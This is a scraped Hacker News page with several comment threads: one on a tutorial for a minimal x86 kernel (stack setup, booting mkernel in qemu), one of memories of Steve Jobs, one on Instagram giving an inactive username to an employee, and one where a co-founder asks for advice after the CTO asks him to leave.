This seems like a good start but it's worth noting that it isn't guaranteed to work correctly.

The problem is that the control is passed to C code with no stack space set up. It works out of pure luck because the compiler has decided to keep all variables in registers and changing your C compiler flags might make this fail in interesting ways.

Another thing that is missing is clearing the .BSS section before passing control to the C code. It's not used at the moment, though.

I am pointing these things out because in my own Ring0 programming projects I spent a lot of time debugging some failures related to stack space and an un-initialized BSS section.

3
akkartik 3 days ago 1 reply      
I got this running on qemu by cannibalizing a tiny bit of code from xv6 (http://pdos.csail.mit.edu/6.828/2012/xv6.html) to replace the GRUB dependency. After cloning and building mkernel according to its instructions:

  $ git clone git://pdos.csail.mit.edu/xv6/xv6.git  $ cd xv6  $ make
Now you should be able to run xv6 by itself:

  $ path-to-qemu/x86_64-softmmu/qemu-system-x86_64 -serial mon:stdio -hdb fs.img xv6.img -m 512
To run mkernel on qemu, we'll replace xv6's kernel with mkernel's:

  $ dd if=/dev/zero of=mkernel.img count=10000  $ dd if=bootblock of=mkernel.img conv=notrunc  $ dd if=../mkernel/kernel of=mkernel.img seek=1 conv=notrunc
Now you can boot up the mkernel.img rather than xv6.img:

  $ path-to-qemu/x86_64-softmmu/qemu-system-x86_64 -serial mon:stdio -hdb fs.img mkernel.img -m 512
(Based on xv6 at hash ff2783442ea2801a4bf6c76f198f36a6e985e7dd and mkernel at hash 42fd4c83fe47933b3e0d1b54f761a323f8350904. Ping me if you have questions; email in profile.)

4
bebop 3 days ago 0 replies      
This is a great resource for anyone who would like to take this further: http://wiki.osdev.org/Expanded_Main_Page

In particular, setting up interrupt handlers, paging, and getting a PIC setup is pretty neat.

5
grahamedgecombe 2 days ago 0 replies      
There's a slight problem in this tutorial in that it assumes ESP (the stack pointer) will be defined by the boot loader to point to an appropriate location for the stack. However, the Multiboot standard states that ESP is undefined [1], and that the OS should set up its own stack as soon as it needs one (here the CALL instruction uses the stack, and the compiled C code may well too).

An easy way to solve this is to reserve some bytes in the .bss section of the executable for the stack by adding a new section in the assembly file:

  [section .bss align=16]    resb 8192    stack_end:
Then before you make use of the stack (between `cli` and `call kmain` would be appropriate in this case), you need to set the stack pointer:

  mov esp, stack_end
[1]: https://www.gnu.org/software/grub/manual/multiboot/multiboot...

6
mbillie1 3 days ago 2 replies      
Very cool. I personally (as a developer without a CS background) find these sorts of posts wonderfully interesting, even if this kernel, as pointed out in this thread, lacks a lot of what a normal kernel does. I'd love to see one of these for a compiler!
7
ahelwer 3 days ago 1 reply      
Neat read so far! Not done yet, but I think I've found a small error in kernel.c: the attribute byte of the characters in "my first kernel" should be set to 0x02, not 0x07.

edit: I misread. 0x07 is intentional, 0x02 was mentioned as an alternative. Good post!

8
tbrock 3 days ago 2 replies      
This was fantastic. My only question is, how does one gain knowledge of the required x86 hardware specifics he mentions? I don't know where to begin looking to uncover these sorts of things:

  - The x86 CPU begins execution at the physical address [0xFFFFFFF0]  - The bootloader loads the kernel at the physical address [0x100000]  - The BIOS copys the contents of the first sector to physical address [0x7c00]
Is there an x86 instruction manual or is this sort of thing passed down through generations of engineers?

9
boulderdash 3 days ago 2 replies      
If anybody is doing this, let me share some words of advice based on experience.

Please use a virtual machine instead of doing this on your primary machine.You eliminate the risk of messing up your machine. Also, if you setup the VM properly, you get a debugger.

10
kyberias 3 days ago 8 replies      
I'm not exactly Linus Torvalds but I'm pretty sure a program that prints one line of text is not "a kernel". :)
11
AdrianoKF 3 days ago 2 replies      
Looks great, will keep an eye on this!

I also really enjoyed James Molloy's OS kernel development tutorial at http://www.jamesmolloy.co.uk/tutorial_html/, which takes you from "Hello World" to some real toy OS kernel implementation.

12
aaren 3 days ago 3 replies      
Can anyone give me an idea how much different this would be for 64bit? Do I just change the nasm directive to `bits 64`?
13
dkarapetyan 3 days ago 1 reply      
I really like the new HN. Quality of articles is way up.
14
jonalmeida 3 days ago 0 replies      
I just finished an Operating Systems final today and the entire class was conceptual and learning fundamentals, while I craved to get my hands dirty and actually try to make a simple OS.

I'll definitely be playing around with this. Thanks!

15
tpush 2 days ago 0 replies      
I have done the same, sort of, only eschewing BIOS for UEFI and thus getting straight to Long Mode :-).

It's pretty basic, currently just boots up and prints the memory map.

It's written in C++11 with the aim to be as clear as possible: https://github.com/thasenpusch/simplixHave a look :-).

16
zenbowman 3 days ago 0 replies      
Looks great, looking forward to dive into this.
17
anarion 2 days ago 0 replies      
Why kernel tutorials always say they need nasm. Gcc already comes with an assembler so simply use it instead of installing other softwares.And if you prefer intel syntax simply add ".intel_syntax;"
18
acomjean 3 days ago 4 replies      
Why C?

I'm just curious if another language can be used. (c++, go, rust).

19
tsenkov 2 days ago 0 replies      
Awesome read, thanks.
20
aortega 3 days ago 3 replies      
Great! except that to be called a kernel it's missing just a process manager, memory manager, filesystem, process separation and hardware abstraction. Yeah I'm that guy, down vote me as you wish, the article is still wrong.

It's a way to load a ring-0 application into grub. Pretty cool, but not a kernel.

21
whydo 2 days ago 1 reply      
The first question is:

Why?

We already have a whole bunch of operating systems, many of them free.

One of the frequent problems with a lot of free/open source software folks is that they lack direction. This type of thing where we do stuff just to do stuff probably won't fly in one of the leading tech companies.

Why don't you figure out a real problem people have and look for ways to solve that, instead of just doing random "interesting" stuff that wastes people's valuable time?

12
Memories of Steve donmelton.com
376 points by zekers  6 days ago   152 comments top 23
1
salgernon 6 days ago 9 replies      
Back in 1999 or 2000, shortly after Steve had rejiggered the cafeteria staff, I was walking back to my office in another building with an "afternoon doughnut" - that is, one that hadn't sold in the morning at the coffee place in the main lobby, and probably sold at a discount.

I passed Steve in the hall and he glared at me as I walked with my doughnut. Steve was in great health in those days while I was pasty and obese. (Still am, sad to say.).

But I was happy with my doughnut. Steve glared at me but didn't say anything. I slunk away.

The next day, there were no more doughnuts at any of the cafs on the main campus. I don't think it's a coincidence.

2
baldfat 6 days ago 1 reply      
I had to stop reading. I also worked for a micro managing CEO/President and I HATED EVERY MINUTE. Knowing that if you did the slightest misstep or were falsely accused you were fired and there was a morning meeting the next day to tell everyone that so and so was no longer with the company. NO THANK YOU!!!
3
adrianoconnor 6 days ago 1 reply      
I always love to read Don's stories, they're always pretty great, and this post is no exception. The last few paragraphs are poignant, and not because it's about Steve, but because the emotion is real and you can relate to it.

Anyway, if you enjoyed this, you should read the history of Safari posts he did a while back, also a podcast he was a guest on one time, though I forget who it was with -- ah, Debug I think -- that was really excellent and well worth listening to.

4
general_failure 6 days ago 4 replies      
It looks like some people like Steve are charismatic enough to get the complete devotion of very talented people. It's a great personality trait to have and pretty much guarantees success. We all know geniuses in our everyday life like Wozniak, Bob, cook. But how many of us can get these guys be terrified of us, make them change their lives for our visin and make them give us their complete attention... That's the beauty of Steve. Despite flaws in his character, people seem to be feel previliged working for him.
5
ZeroGravitas 6 days ago 1 reply      
If after working with him for a decade you have to take a deep breath before you can give him your honest opinion on something, then he's not a busy executive who prioritizes efficient information exchange, he's an asshole.
6
exodust 5 days ago 0 replies      
This story says more about the insecurity of the Safari guy than it does about Jobs.

Sounds like people at Apple spent too much time worrying about what Steve thought of them, whether he'd remember their names or invite them to meetings.

While everyone is worried about what one man thinks, the man himself was thinking about design and business issues, trying to solve problems.

Funny how bookmarks was never really solved in Safari. On my iPad, I hate the bookmarks functionality, it confuses me pretty much every time. When I try to find a bookmark, or add a bookmark, every time it seems I have to "figure out" and remember how to do that. It's not intuitive or snappy. And now with iOS7 flat design, all your bookmarks and history appears as one big list - black text on white background. The lack of interface delineation mean elements bleed into other elements and make it harder to mentally remember where things are found.

If Steve were still around, he'd be kicking someone's ass over the half-baked iOS7 flat design.

7
mildtrepidation 6 days ago 0 replies      
It's certainly interesting to read this sort of reflection. The author discusses Jobs' mannerisms without either worshiping or demonizing him, which is refreshing.
8
xcntktn 6 days ago 0 replies      
Stories like this one and Glenn Reid's essay[1] about working with Steve on iMovie seem to be vastly more informative than any movie or book on SJ.[2] One of the biggest takeaways from both of these essays is that working with Steve was an iterative process. Pop culture always highlights "eureka" moments where a problem is solved all at once in a brilliant flash of insight, yet when you read these first-hand accounts, the story is the opposite: that making something great is a slow and repetitive process, with lots of follow-up meetings and gradual improvement towards the final product. Eureka moments look good on TV, but in the real world, great things are built by long-term focus and hard work from highly talented people with uncompromisingly high standards. I have no idea how or even if that could be shown in a movie, but I'm very thankful we have these accounts. I hope more people who worked with Steve during his second tenure eventually put their thoughts down in writing and share them so that we can all gain more of these types of insights.

[1]http://inventor-labs.com/blog/2011/10/12/what-its-really-lik...

[2]There's also Andy Hertzfeld's folklore.org, however that is focused on Steve's original tenure at Apple, not the "comeback" from the late-90s on.

9
gdonelli 6 days ago 0 replies      
Don has always been such a positive person to be around. Great memories. Thanks for sharing.
10
ghiculescu 6 days ago 1 reply      
Some great stories there. Wasn't sure on the Apple stores presentation joke though, can anyone explain the reference?
11
ksec 6 days ago 3 replies      
I was reading and hoping there was an explanation why Safari for Windows discontinued. It is the only popular WebKit browser ( after Chrome fork to Blink ) on Windows.

Otherwise another great piece.

12
tareqak 6 days ago 2 replies      
I enjoyed the recollections. I probably would have been afraid of his shadow if I was there.

On another note, it would be interesting to see if a website containing all these memories of Steve Jobs ever comes about. A crowdsourced biography if you will: storiesabout/stevejobs .

13
mathattack 6 days ago 0 replies      
Great stories. It says a lot about Apple that time, in addition to Steve. The personal side is good too.

Yes, Steve could be intense at times. But he was also a real person. He had to deal with the ordinary and mundane aspects of life like everyone else. Maybe even enjoy them.

14
hubtree 6 days ago 2 replies      
This part sums up why I quit using OS X for my personal projects: "And if your software crashed, you didnt make excuses. You just made damn sure that particular scenario didnt happen again. Ever."

In making sure nothing ever crashes, Apple has moved more and more to an OS that is too restrictive for my taste.

15
throwaway7548 6 days ago 5 replies      
According to Wozniak, Jobs told him that Atari gave them only $700 (instead of the offered $5,000), and that Wozniak's share was thus $350.[65] Wozniak did not learn about the actual bonus until ten years later, but said that if Jobs had told him about it and had said he needed the money, Wozniak would have given it to him.[66]---

End of story. Before continuing celebrating Jobs, ask yourself a question, do you want to promote that kind of behavior in the Valley?

16
jayvanguard 6 days ago 0 replies      
Sounds like you have to be a sycophant to work for him.
17
theRhino 6 days ago 0 replies      
this is hilarious
18
pskittle 6 days ago 0 replies      
Thanks for posting this!
19
SimHacker 6 days ago 0 replies      
At the National Air and Space Museum reception during Washington DC EduCom in 1988, I took a big bite out of one lobe at the bottom of a three lobed red bell pepper so it looked like an alien's face, and held it up to Steve Jobs, and said "Earthman, give me your seed!"

He looked at me funny, but I couldn't tell if he got the reference to Bizarre Sex #10: http://silezukuk.tumblr.com/post/3151672333 [NSFW]

20
luser 6 days ago 1 reply      
Alternative title: Hagiography of a Dead Psychopath CEO
21
jmnicolas 6 days ago 2 replies      
Am I the only one fed-up with Steve Jobs stories ?
22
misingnoglic 6 days ago 0 replies      
Lol, some of it seems a bit stockholm syndrome-y, but hilarious nonetheless.
23
normloman 6 days ago 1 reply      
Why are we still talking about this guy. I'll bet my life savings that when Woz dies, we'll talk about it for around 2 months.
13
They say nothing will change medium.com
369 points by jonsuh  1 day ago   115 comments top 31
1
gnu8 1 day ago 10 replies      
Those who are defending this as a reasonable and commonplace policy are dissembling at best. This is another example of the emerging electronic class system. Those who are members of the Silicon Valley clique are privileged to take what they want from those who are not. Recall the Googler who was able to have a web page he didn't like shut down, just by calling his connection at Digital Ocean.

One might argue that a thing such as an Instagram account is just a service provided by a business and the business can do as it likes, but this isn't the case. A social media account is a vehicle for the user to interact with the entire world, and it shouldn't be able to be unilaterally revoked, especially if the only reason is to give it to a"more deserving" insider. We need a system of due process for situations like this.

2
josefresco 1 day ago 3 replies      
Before we all seemingly jump on the "she should have updated her account" bandwagon, it would help to see actual evidence of her inactivity, or at least evidence/statements in Instagram's TOS that state what "inactive" really means.

This doesn't cut it: "We encourage people to actively log in and use Instagram once they create an account."

How long can I go idle before Instagram takes my account back?

Also, as someone else stated in this thread the very least Instagram could have done was to email her and inform her that she was about to lose her account due to inactivity.

Lastly, it's important to note that Instagram didn't just "prune" her account, they renamed it and gave her original account name to an employee. If they were concerned with squatters or dormant accounts they would have actually nixed the account, not renamed it to something else.

3
simonsarris 1 day ago 5 replies      
Oh guffaw. Even our beloved Github has a means to let you unseat inactive account names.

https://help.github.com/articles/name-squatting-policy

(And they should, I think.)

Since at least 2012 Instagram has had this in their terms:

> 4. We reserve the right to force forfeiture of any username that becomes inactive, violates trademark, or may mislead other users.

So whine about the policy if you don't like it, but don't whine that Instagram has materially changed.

4
brandon272 1 day ago 0 replies      
I think it's in extremely bad taste to remove an account that's ever had content uploaded to it. Person registered two years ago and hasn't uploaded anything? Sure, prune the account. User creates an Instagram account and uploads some nice family photos and doesn't sign in for a year? Leave it alone!
5
steven2012 1 day ago 0 replies      
It's clear that Facebook etc employees are higher on the virtual caste system than the rest of us peons. The more and more they make this evident, the less interested regular people will be in participating in their virtual world.
6
drgath 1 day ago 1 reply      
As others have mentioned, this was probably due to inactivity. I stopped using Instagram years ago, but still had 'instagram.com/derek', and just checked to see if that was still my username. Nope, it is now 'derek______________', just like '_____kathleen'. The fact that a FB employee now owns the 'kathleen' user means they probably have an internal reservation system for expired accounts, which is a nice perk.
7
lazerwalker 1 day ago 3 replies      
Whoever you think is in the wrong here, the real takeaway is a reminder that when you use a VC-funded for-profit service, you don't "own" anything.
8
avree 1 day ago 4 replies      
This isn't actually an uncommon policy. For example, Twitter lets (or used to let?) you take a username that's inactive for 9 months.

Source: http://sarahwallace.wordpress.com/2010/09/23/how-to-request-...

The Facebook stuff is probably a red herring here. If there was activity on the account, I bet this would never have happened.

9
klenwell 1 day ago 1 reply      
Worried about having someone steal your invaluable Twitter or Instagram username?

The solution is obviously to immediately litter all your social media accounts with such foul loathsome toxic content that no one else would want to touch them again for at least the next 1000 years.

10
jonsuh 1 day ago 4 replies      
Taken straight from Instagram's policy:

> "We encourage people to actively log in and use Instagram once they create an account. To keep your account active, be sure to log in and share photos, as well as like and comment on photos. Accounts may be permanently removed due to prolonged inactivity, so please use your account once you sign up!"

Source: https://www.facebook.com/help/instagram/294919817276863

The wording is terribly obtuse and seems targeted more for username squatters.

Would be helpful if Instagram defined what a period of prolonged inactivity is. Shady nonetheless, considering they didn't even notify her informing her that her username was revoked due to inactivity.

11
tensafefrogs 1 day ago 0 replies      
"A few months ago while tagging my wife"

"This morning I told her I Instagrammed a photo of our kids that she should see."

Instagram names are not domain names, and it sounds like she doesn't use the account. Most services have a clause that lets them reclaim inactive accounts after a set period of time.

12
ampersandy 1 day ago 1 reply      
What does this have to do with Facebook and the acquisition? Anyone working at Instagram pre-acquisition would also have been able to reclaim inactive handles.

Twitter does this as well and that's how I got my current username. There are a couple of things that are required before you could reclaim a handle (I forget the exact timespans, but it was close to this):

    * Has not logged in for one year    * Has not tweeted in a year and half    * Does not any have applications linked to Twitter
If Instagram has a similar policy, I really don't have any sympathy that the username was taken.

13
uptown 1 day ago 0 replies      
Update Apr 16, 2014 @2:34pm: Im very pleased to announce that Facebook / Instagram did the right thing and delivered my wifes Instagram handle back to its rightful place: http://instagram.com/kathleen
14
gordaco 1 day ago 0 replies      
This looks like an employee acting on her own, thinking (wrongly) that the account was not active and nobody would notice if she took over the username. Still, it's a disturbing issue that shouldn't have been allowed to happen, so if this is the case I hope the employee gets some penalty. And the fact that this was possible, or maybe even legal (I don't know Instagram's terms of service), doesn't make it less of a dick move.

I was an employee for a local social network with about ~10mil registered users (~5mil daily users). It was much smaller than Instagram, but despite that (or precisely because of that) things like this were completely forbidden.

15
raesene3 1 day ago 0 replies      
What I think is interesting about this is more the general case than this specific example. I'd say that people's social media handles are becoming more and more important to them, so loss of them becomes increasingly bad.

A lot of people in the tech world are probably more known by things like their twitter handle than their real name.

With free services (and indeed perhaps with paid for) there's not a lot to stop a company changing the ToS to allow for usernames to be transferred as they like(assuming it's not already in the ToS).

Now if your chosen handle is pretty niche (no one who's not a fan of 90's ADnD settings is likely to want mine), it's probably not a big risk, but for other ones it seems plausible to suggest that a company might start seeing them as a valuable asset, to be monetized..

16
owenversteeg 1 day ago 0 replies      
This happened to me (employee of the company took my username) with a different service, and a quick tweet to the founder had my account restored.

I'm not going to identify the website because the person that made it is a nice guy in general and he restored my account right after I asked.

17
dmschulman 1 day ago 0 replies      
This is the new norm now that these web services are no longer a niche product. Some kind of set standard for inactivity would be nice so users are aware of when they are in danger of losing their username.

I know many who set out to register popular Twitter and Soundcloud names when those services launched just so they could sit on them and possibly make a buck. Those username policies are out there to combat this kind of behavior but it's crummy to see when those policies actually affect legitimate users.

18
thehme 1 day ago 0 replies      
I read "..she opened up Instagram on her phone (shes not a regular on the service anymore)", and wondered, does he mean that @kathleen has not been using it for a while (months)? There is no justification for stealing a handle, but I was just wondering. I recall once I wanted to have a specific handle on twitter for an idea I had, so I contacted the owner via a private message. He/she has no tweets and to this day, I have not heard from him/her yet. Would anyone be open to perhaps having an "expiration" date on our accounts? Sometimes I feel like there are robots out there claiming every possible handle, so that, idk, they can sell it later?
19
dublinben 1 day ago 1 reply      
You have no ownership over a username in a private service. Your access can (and will) be terminated at any time in accordance to their Terms of Service. If you want to maintain control over your identity and presence online, you ought to use self-hosted services like Pump.io or Diaspora.
20
xacaxulu 1 day ago 0 replies      
When can we start taking accounts of deceased persons?
21
yankoff 1 day ago 0 replies      
This is just unbelievable.. Have you tried to email their support? It's hard to believe that that could be an acceptable practice at any company, I would assume it's just some employee being a jackass.
22
rch 1 day ago 4 replies      
Why don't new services default to using a random string as an identifier, along with an alias for display, instead of a requiring a unique username?

Managing overlapping names among friends is something most people know how to do well enough already.

23
reshambabble 1 day ago 0 replies      
There are two interesting groups at play here - the tech companies that own all data, usernames, etc. on their platform and the user that needs to be on their platform for the company to exist and be successful. Our private information becomes public information when we share it with some of these companies, and they are given permission to own and use the information to a certain extent. They promise us security and stability at first because they need us, but when they don't depend on us anymore they can get away with sacrificing those users who don't contribute enough in order to serve their own interests. Because what does losing one person do to them? Are we all going to boycott Instagram now? Probably not. There definitely needs to be some regulation on how internet-based businesses can use and change a user's information because our public/internet identity has become so integrated into our lives that an incident like a sudden change in username can feel like a violation of privacy (even when it's not really one).
24
emsy 1 day ago 0 replies      
So what's next? Facebook employees breaking into houses and stealing Occulus Rift DevKits that haven't been used for a while? SCNR
25
qwerta 1 day ago 0 replies      
Is not there some 'anti hacking' law in US? Aaron S. got like 30 years for downloading a few documents.

Call FBI and see what happens.

26
centizen 1 day ago 0 replies      
Instagram has done this in the past as well, and IIRC; before the merger. But by all means - jump on the Facebook hatewagon and take a ride.
27
Im_Talking 1 day ago 0 replies      
I hate Facebook and, by association, I hate every Facebook subsidiary. They are monetizing your privacy.
28
logfromblammo 1 day ago 0 replies      
I feel as though this would be a good opportunity to remind people that choosing an Internet handle that has any connection to your public identity name is not necessarily a good idea. The potential name space for memorable, usable, easily-typed handles is much larger than the list in the baby names book, and there is value in avoiding collisions.

As my own public name is two of the most common first names and one of the most common last names in the Anglophone world, I am not altogether unfamiliar with the disutility in using a common name.

Aside from that, in the real world, we have a host of disambiguators available to tell the difference between two individuals with similar names. There is no particular reason why a site's user handle would need to be unique. The data store should probably be keying everything on a serial ID number anyway. Just as the DNS exists to associate names with IP numbers, a handle resolver could use disambiguators as needed to minimize disruption of the user experience due to non-uniqueness.

If you log in from a new device with a new IP address, you might be asked "Which 'kathleen' are you?" once, and get a small "I'm a different 'kathleen'" link thereafter. If you're a giant like Facebook, there is probably more utility in allowing people to have short, non-unique user handles with an on-demand disambiguation system than in a system required to enforce user handle uniqueness.

29
geldedus 1 day ago 0 replies      
glad I have deleted my Instagram account back when the policy change scandal; this incident confirms Instagram is a BS site
30
fbndki 1 day ago 0 replies      
Welcome to the nightmare
31
bichiliad 1 day ago 0 replies      
I wonder if this is just really, really clever PR to get people to use their accounts more.
14
Ask HN: CTO wants me to leave
368 points by cantlookaway  5 days ago   272 comments top 122
1
Bluestrike2 4 days ago 10 replies      
You need to hire an attorney, one who works in business litigation (if you can find someone specializing in minority shareholder disputes, that much the better). Right now. If you're delaying on this point out of some idea of wanting to "try to fix things first" or "not wanting to be the bad guy," you're just shooting yourself in the foot and downing blood thinners to keep the wound from clotting. Working with an attorney is not the same as filing suit, and you will never be worse off in this sort of situation for having sought outside counsel. You also need to find your own attorney; the company's counsel works for the company itself, not for any of its investors, executives, or employees.

Judging from your story, your situation is pretty clear: you're being squeezed-out. Sadly, it's not uncommon. Though he might not be asking you to leave right now, framing it as in a few months is just an effort to (i) get some additional benefit out of you, and (ii) give them the time they need to break you.

There are two possibilities right off the bat: (i) the CEO is involved, which is likely given the difficulty involved in squeezing-out a shareholder + 50% co-founder; (ii) the CTO is working alone, hoping to push you out the door and benefit in some way from the resulting vacuum. In either case, you can't move forward without speaking to an attorney. And don't you dare think for one second that you can "just talk to the CEO first."

Already, you're talking about things as an employee rather than an owner. That's your first mistake. An employee might be able to be kicked to the curb, but you're not just an employee. You've already made a significant investment into the company, and from their perspective, an ideal/successful squeeze-out is one that deprives you of that ownership interest entirely. Most of these efforts are successful because they manage to position the person being targeted in a position where they just roll over. Ideally, they force the person being squeezed out to choose to quit rather than actually be fired. It seems like that's the CTO's goal in your situation.

That said, there are few programmers, in my opinion, whose work is so bad that there is zero potential for future improvement. Considering the costs of pushing you out, you'd have to be doing a hell of a lot more than just writing shit code to justify termination. Given that they want to wait until after additional fundraising rounds are completed, I doubt that your involvement with the company is nearly so problematic. Besides, you already stated that there's been a clear improvement in your code.

I was in a similar situation, once. I was foolish, stupid, and trusted a friend I've known for years. I did the development work, partner A brought his business skills and industry contacts to the table along with his money (and a third partner, B, as well). Did the work, but during that time, there was no sight of their money. One of the earliest clues I was going to be screwed was, when discussing fundraising, A mentioned his own deferred pay. Something I thought slightly peculiar given that he was supposed to be investing his own, significant funds along with B. Plus, I don't believe that he actually did any measurable work during the time period that would justify it based on what I knew at the time. Investors are rightly finicky about deferred salaries, and the bar is pretty high to justify them.

When we were at the end, I found myself being squeezed-out: in the end, they apparently figured that it'd be cheaper to outsource to some ridiculous "startup in the box" type of company rather than deal with my deferred pay and the long-term consequences of a third founder's ownership interests) even though doing so would delay things by a couple of months. They even managed to time things well: the weekend of my grandmother's funeral, after A had been told about it, they dropped their little bomb on me. The only good thing was that they walked away without getting a single line of code that I'd written.

My parting was anything but on good terms. Eventually, I wound up not pursuing the matter in court--talking it over with my attorney, it became quite clear that the legal fees of fighting them would be ruinous. That partner C was a shyster of an attorney, and all evidence suggested that they'd just try to wait out the expensive clock rather than consider settling. After all, the cost of doing so would be pretty minimal. Litigation is uncertain and expensive. Painful though it may be, you never ever litigate on principle. Not if you have any brains at all.

Even though I would have likely prevailed given the facts, I would have come up horribly in the red when it was done. A pyrrhic victory and no more. Choosing not to go down that route was one of the harder decisions of my life, made all the more difficult by the knowledge that they had, quite literally, taken even my grandmother's funeral away from me.

Oddly enough, I'm probably better off for it now that I have some distance and perspective to look back. When they launched, it was unobserved and uneventful. Even now, they're unknown with almost no traffic and engagement. They've also made a number of bad mistakes that I had identified--often through trial and error--that I had told them about. It was a submarine rigged for silent running, deep and quiet, that's never bothered to surface for air. All of partner A's vaunted experience and extensive media contacts in the industry proved for naught in the end. Eventually, they'll simply wither and die on the vine. Had they not squeezed me out, no doubt I'd still be hanging on trying to turn things around. After all, who abandons a friend? It was quite the learning experience, albeit an incredibly expensive one.

Luckily, you can avoid that sort of experience by acting now to protect yourself. Document everything, save all of your emails, chat logs, download and archive all Github comments on everything that you've worked on, as well as everything else you can. Make sure that you're also grabbing copies of emails off any servers/accounts they might have access to. Even though it will create problems if there's any litigation, there's a high likelihood that they'll do something foolish such as delete them.

You have a lot going for you right now that'll help you. First, you're obviously still needed to help their raise funds. Second, investors are scared to death of founder disputes. If any potential investors even sniff the possibility, they'll run and never look back while your current investors will raise holy hell, even if the CEO+CTO were able to find some fig leaf of justification. It also implies a deviousness that will scare investors; if they're willing to screw a friend and risk such a serious dispute, then it's also possible that they'll wander into similar situations in the future. Particularly in the early stages, investors and VC firms don't have to put up with that sort of bullshit.

This gives you an absurd amount of leverage: you have the ability to single-handedly kill their fundraising efforts now and in the future. You need to call your attorney and start using it. At the very minimum, it'll put the breaks on any plans they're currently working on. At best, it'll help you move forward as a company without having these sorts of problems lurking about in the shadows.

2
gtCameron 5 days ago 5 replies      
The question I would try and answer if I were in your shoes is the following:

Does he want me to leave the company or does he want me to stop writing production code for the product?

If its the first one, there is likely a personal issue between the two of you that needs to be resolved one way or another.

If you think the second option is what he is really trying to communicate, then I would look for other opportunities to contribute to the company. It sucks to grasp your own limitations and admit that you might not be a good enough coder to contribute to the product at this point, but this is a critical time for the future of the product. Any technical debt acquired at this phase of development is going to be very costly to pay off later since you are developing the core of the system.

However, you are a founder of the company, and I am assuming very passionate about the company's mission as well as financially motivated to see this thing through. There are tons of jobs that will need to be done as you guys grow, and each one of those is an opportunity for you to contribute above and beyond what a new hire off the street could accomplish. A lot of those jobs can also take advantage of your coding skills to either automate processes or utilize your deeper understanding of how the product works to better support it.

This is of course assuming that you guys have the cash in the bank to pay you for this work, if that is not the case then the situation is a little trickier and you will have to explore other options.

3
9oliYQjP 5 days ago 2 replies      
First off, I'm sorry about your situation. Nobody here will be able to judge with any degree of accuracy whether he has a point. I personally would not look at this situation as a technical one; this is a business relationship situation.

Regardless of whether there is any grain of truth, the CTO has lost confidence in you. Not just a little bit. He has asked you to leave. The rest of my advice assumes the CEO (your co-founder) has quite a bit of confidence in the CTO. If that is the case, I'm not quite sure you can come back from having the CTO asking you to leave, nor am I certain you should.

I think it would be advisable to talk to a lawyer to see how you can cleanly and professionally leave on your own terms. Save the emotional stuff for friends and your alone time. You will no doubt need to grieve (this was your baby). But I think it would be better for you to be proactive about leaving and professionally extract yourself from this situation. That said, make sure you know your rights and what your contracts entitled you to in such a situation.

Once extracted, take your hurt pride and prove them wrong.

4
hoodoof 5 days ago 2 replies      
Listen Eduardo Saverin:

FIRST THING GET YOUR OWN LAWYER AND TALK TO THEM NOW!

The key question here is : do you have equity, and how much equity do you have in percentage terms?

If you are an equal cofounder, then when someone turns up and says "you have to leave cause better people have been employed", you say "fuck off". Think about it - EVERY company that grows will employ people who are better than the cofounders in some way, that is the whole point. You are the FOUNDER, you brought value to the company early. Just because smarter or more experienced people have been employed in no way devalues what you did in the early stages. In fact this is PRECISELY what is meant to happen. Do you think that Zuckerberg is the best developer at Facebook - legend may say so but it's not true - can't be. So should Zuck be fired cause he's not their strongest tech guy?

You also need to think separately about your rights as employee and rights as a shareholder/owner - they are not the same thing. You DO have clear contracts as both employee and shareholder DON'T YOU? Those contracts specify (or should specify) your rights.

And who the fuck does this guy think he is that he can tell a cofounder to leave? You are his BOSS.

DO NOT LEAVE. And if you do leave, DO NOT SELL YOUR SHARES IN THE COMPANY - just say "I want a MASSIVE payout to accept being fired, and I WILL NOT sell my shares as part of settlement". Hang on to those shares because now these guys are going to do all the hard work in growing the company and you can chill out and do other things and when they IPO, you'll take home your share. And if this is the path you take, look out cause some time in the future they will try to play a legal game in which you hang on to your shares but they get diluted down to almost nothing. This cannot happen if you are careful to look out for it.

This is all on the assumption that you do have equity and contracts in place. If you don't, then you should go and watch "The Social Network" repeatedly until you learn your lesson.

5
carbocation 5 days ago 1 reply      
You have phrased this as an almost apologetic post, focusing on your ability to write code. An analogy to medicine might be worrying about your ability to take a good history and physical exam, but in the meanwhile the patient is bleeding in front of you.

The problem is not your ability to write code - the CTO even admits as much when he says he needs you now but wants to replace you later. Your code is desperately needed. But I don't really care about this.

Assuming a normal situation, the company is yours and your co-founder's (by ownership), and the CTO likely has a small amount of equity (relative to yours). In an early stage company that hasn't yet raised money, your company is basically an extension of yourself. You don't have responsibilities to shareholders or employees because you don't have either yet. You have a responsibility to yourself and your vision. The CTO did not found the company and that alone tells you that you have some amount of vision, ability, or ability to take advantage of chance that he did not have.

If you want to remain involved in the company, and it seems that you do and should, then you need to clarify for the CTO where the boundaries of his responsibilities lie. His job is not to ask you to quit, and he may be beyond the point where you can continue working with him (or not - I don't know enough detail). But if he is to continue working for you (and do recall that he works for you at your pleasure), he needs to focus on solutions that don't involve him trying to fire you.

Most founders don't end up coding very much after their companies grow, and the CTO may be hopeful to get more experienced programmers working for the company. But there are about 10,000 miles in between "we should hire people with deep experience in X" and "I want you to leave the company." The latter is a political gambit that needs to be dealt with after careful consideration in a way that shows teeth.

6
avenger123 5 days ago 2 replies      
It looks like you have real equity in the company and there is possible traction in the business.

You are a co-founder. That counts for a lot. I am also assuming that your equity stake is significant.

First of all, deal with this right now. Don't wait for the 3-6 months. You are basically being told that once they have raised money, they will find a way to get you out. Right now, it's a fishing expedition between the CTO and the other founder. Will you be a nice gentle person and go along with their approach or are you going to turn into an attack dog.

You likely have tremendous leverage right now due to this funding round coming up. They will not want to rock the boat. But this is exactly when you should be doing it as I don't believe the "we need you" bit means anything other than "we don't want you to fk up our funding round coming up".

At the end of the day, if they really want you out, they'll find a way to do so. The main thing is that you got to get on the offensive and make sure if you do end up leaving the company, you've left on the best financial terms possible for yourself. Make them pay. In fact, throw out a number you are comfortable with and have them pay you out from that in the next funding round.

If you approach this as "what's best for the company", you have already lost because that's not what this CTO and your other founder are approaching this from.

EDIT: You should provide some more detail on the equity position you have and how formalized it is (ie. proper contracts). Being a co-founder isn't about just writing code. As others have said, if you have significant equity, you have a lot of power. Don't underestimate this.

7
icambron 4 days ago 3 replies      
Leave. Seriously, walk away. Here are some thoughts:

